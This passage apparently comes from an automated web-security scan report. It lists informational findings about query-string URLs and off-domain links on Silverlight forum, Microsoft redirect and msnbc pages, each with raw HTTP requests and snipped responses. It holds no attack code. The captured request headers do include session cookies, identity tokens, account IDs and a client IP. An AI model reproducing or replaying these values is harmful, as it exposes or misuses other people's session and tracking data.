Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; CommunityServer-LastVisitUpdated-2101=; CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:15:22 GMT
Content-Length: 531


<html><head></head><body><body bgcolor="#FFFFFF"><!-- begin ZEDO for channel: Neudesic , publisher: Neudesic , Ad Dimension: Super Banner - 728 x 90 -->
<script language="JavaScript">
var zflag_ni
...[SNIP]...
</script>
<script language="JavaScript" src="http://d2.zedo.com/jsc/d2/fo.js"></script>
...[SNIP]...

22.85. http://forums.silverlight.net/adchain.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /adchain.html?ZoneID=401&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: forums.silverlight.net
Proxy-Connection: keep-alive
Referer: http://forums.silverlight.net/user/viewonline.aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sun, 30 Jan 2011 11:12:38 GMT
If-None-Match: ""

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=jpa4b2tmv00xztbp02qimbps; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 20:05:38 GMT
Content-Length: 362


<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.asp.net/a.aspx?Task=Click&ZoneID=401&CampaignID=1855&AdvertiserID=129&BannerID=2492&SiteID=2&RandomNumber=1812121156&Keywords=" target="_Blank"><img src="http://ads.asp.net/ads/W_DevSum11-bann_728x90.gif" width="728" height="90" alt="" align="Center" border="0"></a>
...[SNIP]...

22.86. http://forums.silverlight.net/adchain.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /adchain.html?ZoneID=416&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: forums.silverlight.net
Proxy-Connection: keep-alive
Referer: http://forums.silverlight.net/user/viewonline.aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sun, 30 Jan 2011 11:12:38 GMT

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=cmxfsxg2vyina4ashnvp00ci; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 17:57:35 GMT
Content-Length: 408


<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.asp.net/a.aspx?Task=Click&ZoneID=416&CampaignID=1904&AdvertiserID=200&BannerID=2540&SiteID=2&RandomNumber=253691245&Keywords=" target="_Blank"><img src="http://ads.asp.net/ads/myappis_banner_300x250rev2.gif" width="300" height="250" alt="Advertisement - My App Is On Windows Phone" align="Center" border="0"></a>
...[SNIP]...

22.87. http://forums.silverlight.net/adchain.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /adchain.html?ZoneID=401&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: forums.silverlight.net
Proxy-Connection: keep-alive
Referer: http://forums.silverlight.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; CommunityServer-LastVisitUpdated-2101=; CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:15:39 GMT
Content-Length: 391


<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.neudesicmediagroup.com/a.aspx?Task=Click&ZoneID=58&CampaignID=519&AdvertiserID=51&BannerID=471&SiteID=6&RandomNumber=1060255360&Keywords=" target="_Blank"><img src="http://ads.neudesicmediagroup.com/ads/ClientUI%20ad1%20(728x90).jpg" width="728" height="90" alt="" align="Center" border="0"></a>
...[SNIP]...

22.88. http://forums.silverlight.net/adchain.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /adchain.html?ZoneID=389&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: forums.silverlight.net
Proxy-Connection: keep-alive
Referer: http://forums.silverlight.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; CommunityServer-LastVisitUpdated-2101=; CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:15:22 GMT
Content-Length: 381


<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.neudesicmediagroup.com/a.aspx?Task=Click&ZoneID=58&CampaignID=464&AdvertiserID=11&BannerID=403&SiteID=6&RandomNumber=1318074501&Keywords=" target="_Blank"><img src="http://ads.neudesicmediagroup.com/ads/Charting-728x90.png" width="728" height="90" alt="" align="Center" border="0"></a>
...[SNIP]...

22.89. http://forums.silverlight.net/forums/TopicsNotAnswered.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/TopicsNotAnswered.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /forums/TopicsNotAnswered.aspx?ForumID=-1 HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 73694
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:20:39 GMT; expires=Sun, 29-Jan-2012 23:20:39 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:40:40 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:20:40 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Thread
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...
</p>
<a href="http://msdn.microsoft.com/"><img class="logo_msdn" alt="MSDN" src="http://i1.silverlight.net/resources/images/content/misc/header_logo_msdn.png?cdn_id=12152010">
...[SNIP]...
</iframe><a href="http://www.neudesicmediagroup.com/Advertising.aspx?site=Silverlight"><img src="http://i1.silverlight.net/resources/images/content/misc/placeholder_advertisehere_top.png?cdn_id=12152010" alt="Advertise Here" />
...[SNIP]...
</iframe>
<a class="link_advertise" href="http://www.neudesicmediagroup.com/Advertising.aspx?site=Silverlight">Advertise Here</a>
...[SNIP]...
</iframe><a href="http://www.neudesicmediagroup.com/Advertising.aspx?site=Silverlight"><img src="http://i1.silverlight.net/resources/images/content/misc/placeholder_advertisehere.jpg?cdn_id=12152010" alt="Advertise Here" />
...[SNIP]...
</a> &#124; <a href="http://www.neudesicmediagroup.com/Advertising.aspx?site=Silverlight">Advertise with us</a>
...[SNIP]...
<div class="footer_img_links">
<a href="http://www.asp.net" title="ASP.net"><img src="http://i1.silverlight.net/resources/images/content/misc/aspnet.png?cdn_id=12152010" alt="ASP.net" />
...[SNIP]...
</a>
<a href="http://channel9.msdn.com" title="Channel 9"> <img src="http://i1.silverlight.net/resources/images/content/misc/channel9.png?cdn_id=12152010" alt="Channel 9" /></a>
<a href="http://edge.technet.com/" title="Edge Technet"> <img src="http://i1.silverlight.net/resources/images/content/misc/technet.png?cdn_id=12152010" alt="Edge Technet" /></a>
<a href="http://www.iis.net" title="IIS"><img src="http://i1.silverlight.net/resources/images/content/misc/iis.png?cdn_id=12152010" alt="IIS" /></a>
<a href="http://visitmix.com/" title="MIX"><img src="http://i2.silverlight.net/resources/images/content/misc/mix.png?cdn_id=12152010" alt="MIX" /></a>
<a href="http://www.msdn.com" title="MSDN"><img src="http://i3.silverlight.net/resources/images/content/misc/msdn.png?cdn_id=12152010" alt="MSDN" /></a>
<a href="http://www.windowsclient.net" title="Windows Client"> <img src="http://i3.silverlight.net/resources/images/content/misc/windows_client.png?cdn_id=12152010" alt="WindowsClient" />
...[SNIP]...
<noscript><a href="http://www.omniture.com" title="Web Analytics"><img src="http://msstonojsslvnet.112.2O7.net/b/ss/msstonojsslvnet/1/H.20.2--NS/0" height="1" width="1" border="0" alt="" /></a>
...[SNIP]...

22.90. http://forums.silverlight.net/forums/topicsactive.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/topicsactive.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /forums/topicsactive.aspx?forumid=-1 HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 73525
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:20 GMT; expires=Sun, 29-Jan-2012 23:17:20 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:37:21 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:17:21 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   The Of
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...
</p>
<a href="http://msdn.microsoft.com/"><img class="logo_msdn" alt="MSDN" src="http://i1.silverlight.net/resources/images/content/misc/header_logo_msdn.png?cdn_id=12152010">
...[SNIP]...
</iframe><a href="http://www.neudesicmediagroup.com/Advertising.aspx?site=Silverlight"><img src="http://i1.silverlight.net/resources/images/content/misc/placeholder_advertisehere_top.png?cdn_id=12152010" alt="Advertise Here" />
...[SNIP]...
</iframe>
<a class="link_advertise" href="http://www.neudesicmediagroup.com/Advertising.aspx?site=Silverlight">Advertise Here</a>
...[SNIP]...
</iframe><a href="http://www.neudesicmediagroup.com/Advertising.aspx?site=Silverlight"><img src="http://i1.silverlight.net/resources/images/content/misc/placeholder_advertisehere.jpg?cdn_id=12152010" alt="Advertise Here" />
...[SNIP]...
</a> &#124; <a href="http://www.neudesicmediagroup.com/Advertising.aspx?site=Silverlight">Advertise with us</a>
...[SNIP]...
<div class="footer_img_links">
<a href="http://www.asp.net" title="ASP.net"><img src="http://i1.silverlight.net/resources/images/content/misc/aspnet.png?cdn_id=12152010" alt="ASP.net" />
...[SNIP]...
</a>
<a href="http://channel9.msdn.com" title="Channel 9"> <img src="http://i1.silverlight.net/resources/images/content/misc/channel9.png?cdn_id=12152010" alt="Channel 9" /></a>
<a href="http://edge.technet.com/" title="Edge Technet"> <img src="http://i1.silverlight.net/resources/images/content/misc/technet.png?cdn_id=12152010" alt="Edge Technet" /></a>
<a href="http://www.iis.net" title="IIS"><img src="http://i1.silverlight.net/resources/images/content/misc/iis.png?cdn_id=12152010" alt="IIS" /></a>
<a href="http://visitmix.com/" title="MIX"><img src="http://i2.silverlight.net/resources/images/content/misc/mix.png?cdn_id=12152010" alt="MIX" /></a>
<a href="http://www.msdn.com" title="MSDN"><img src="http://i3.silverlight.net/resources/images/content/misc/msdn.png?cdn_id=12152010" alt="MSDN" /></a>
<a href="http://www.windowsclient.net" title="Windows Client"> <img src="http://i3.silverlight.net/resources/images/content/misc/windows_client.png?cdn_id=12152010" alt="WindowsClient" />
...[SNIP]...
<noscript><a href="http://www.omniture.com" title="Web Analytics"><img src="http://msstonojsslvnet.112.2O7.net/b/ss/msstonojsslvnet/1/H.20.2--NS/0" height="1" width="1" border="0" alt="" /></a>
...[SNIP]...

22.91. http://go.microsoft.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://go.microsoft.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /?linkid=9759252 HTTP/1.1
Host: go.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: MSID=Microsoft.CreationDate=01/12/2011 02:50:01&Microsoft.LastVisitDate=01/12/2011 02:50:01&Microsoft.VisitStartDate=01/12/2011 02:50:01&Microsoft.CookieId=999b633b-60f0-47aa-b786-00cf3055d1d4&Microsoft.TokenId=92dc7eb2-dead-49da-9574-c9e669f255fd&Microsoft.NumberOfVisits=1&Microsoft.IdentityToken=NbkBuOI4W7cBv1mnAHhVbMOQZR4pSFpAnK7y46YYoMuoTqVfvpOJDTYUAUbtS2cNI8BvaR+SCC23nZMTeytyi7wNmiKQoC0huKoVOxO9PG4349NCx7DVlNmV/I4bkLVsQPDWI9Bsqfw4CAigE1dAh1BYCtKZo9uqxkgiGwXq+e0k2CWQBMJydEvQvf+a8Nmy0lBvBx9sMp029vD2knhH9q3cjQbZxn3d/T9SCIAmvvv/s2I5E7D3U2bYKmXA8D2pYaGjWhFIkGPPBwVNdZM0gBNghumGYE3ytU+ILnGMVeSvePI6D6PqDJrflWnDWzImxN5OE1evuVhNxF+HLtGrIkyVXonl+BTy57QP6nzOR8xDTgEwSjCHY8/Bk9JyRwZg7yIiU4jUEbrdJT2XMDr4AswK4Wiy1TGrclwPTNsTA9c0XB9nYdOMBy66L0gCAgZ5Xl2KxwR+ak8o2EGeRwJddAgw92owb1NRPjd/6vkOYqly9qWJu5Yj/8uUccCK8nxtzsHYjQ2KgbbGdKcZOJMx5arSS+8FsBl+/Opeqt5VTOk=&Microsoft.MicrosoftId=0237-9950-5424-5770; WT_FPC=id=173.193.214.243-2629510496.30125799:lv=1294837831501:ss=1294837831501; A=I&I=AxUFAAAAAAAWBwAAtB6/BX1JsfAlwGK0F9Loug!!&M=1; msdn=L=1033; omniID=1294458843112_6a73_9555_4be9_86ce555049db; ixpLightBrowser=0; WT_NVR_RU=0=technet:1=:2=; MC1=GUID=60c2f44dfd912641a24c313b7d619d75&HASH=4df4&LV=20111&V=3;

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Length: 154
Content-Type: text/html; charset=utf-8
Expires: Sat, 29 Jan 2011 23:22:29 GMT
Location: http://live.visitmix.com/Registration
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:23:29 GMT

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://live.visitmix.com/Registration">here</a>.</h2>
</body></html>

22.92. http://go.microsoft.com/fwlink/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://go.microsoft.com
Path:   /fwlink/

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /fwlink/?LinkId=69157 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: go.microsoft.com
Cookie: MSID=Microsoft.CreationDate=01/01/2011 01:19:35&Microsoft.LastVisitDate=01/01/2011 01:19:36&Microsoft.VisitStartDate=01/01/2011 01:19:35&Microsoft.CookieId=5936fd78-823e-4d23-86ed-4e6db6ac8f1c&Microsoft.TokenId=f70fdaf0-f92a-4b5d-a32e-37393a50bd2e&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0284-8242-0555-1674; MC1=GUID=5b046e389ed92e4ea31425cd07b41623&HASH=386e&LV=201012&V=3; A=I&I=AxUFAAAAAADnCAAA1xAOwzpNh6/jVe+nUDXygw!!; MUID=AD04D6F8B2FF44629973BD0674351135; ixpLightBrowser=0

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Length: 135
Content-Type: text/html; charset=utf-8
Expires: Sat, 29 Jan 2011 23:25:27 GMT
Location: http://www.redacted
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:26:26 GMT

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.redacted">here</a>.</h2>
</body></html>

22.93. http://ingame.msnbc.redacted/_news/2011/01/25/5916141-my-virtual-girlfriend-is-real-world-creepy

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ingame.msnbc.msn.com
Path:   /_news/2011/01/25/5916141-my-virtual-girlfriend-is-real-world-creepy

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /_news/2011/01/25/5916141-my-virtual-girlfriend-is-real-world-creepy?chromedomain=technolog HTTP/1.1
Host: ingame.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:08:28 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 109171


<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>In-Game - 'My Virtual G
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="RSS" href="http://ingame.msnbc.redacted/_feeds/rss2/author" />
<link class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/39f49614ef57bfa39918e852b69f13f139a7e311.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/a13fb07a18e3230078b48aadd2b832aa48d9f59f.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/8279c89e6cbfbec39495cd10332ce1234f0aa2d8.js?v=23247"></script>
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/abstractmartinblog/base.css?v=23247" />
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/abstractmartinblog/style.css?v=23247" />
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/ingame/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=c5916141&amp;rand=416435750&amp;do=msnbc.redacted&amp;ad=9:9:80;44::;27:27:108;9:9:80;86:86:270;87:87:209;9:9:80;86:86:270;87:87:209;9:9:80;86:86:270;87:87:209;9:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>
...[SNIP]...
<li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a>
...[SNIP]...
<li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
...[SNIP]...
<li class="i7"><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li class="i9"><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li class="i18"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" target="_blank">Feedback</a>
...[SNIP]...
<li class="i19"><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li class="i20"><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li id="bing" class="i3 bing"><a href="http://www.bing.com"><span>
...[SNIP]...
<li class="i2 show-today"><a href="http://today.msnbc.com/">TODAY</a></li>
           <li class="i3 show-nightly"><a href="http://nightly.msnbc.com/">Nightly News</a>
...[SNIP]...
<li class="i4 show-mtp"><a href="http://mtp.msnbc.com/">Meet the Press</a>
...[SNIP]...
<li class="i5 show-dateline"><a href="http://dateline.msnbc.com/">Dateline</a>
...[SNIP]...
<li class="i6 show-maddow"><a href="http://rachel.msnbc.com/">Maddow</a>
...[SNIP]...
<li class="i8 show-hardball"><a href="http://hardball.msnbc.com/">Hardball</a>
...[SNIP]...
<li class="i9 show-msnbc"><a href="http://tv.msnbc.com/">msnbc tv</a>
...[SNIP]...
<li class="i10 site-newsvine"><a href="http://www.newsvine.com/">Newsvine</a>
...[SNIP]...
<li class="i11 site-everyblock"><a href="http://www.everyblock.com/">EveryBlock</a>
...[SNIP]...
<li class="email_subscribe_option"><a href="https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.redacted"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-email.png" width="19" height="18" alt="Icons Email"> Receive e-mail updates</a>
...[SNIP]...
</div><a href="https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.redacted">change this</a>
...[SNIP]...
<div class="spinner hide"><img src="http://www.polls.newsvine.com/_vine/images/__/spinner.gif" width="16" height="16" alt="Loading" /> Saving...</div>
...[SNIP]...
<a href="http://ingame.msnbc.redacted/_feeds/rss2/author"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-feed.png" width="18" height="18" alt="Icons Feed"> Subscribe to RSS</a>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
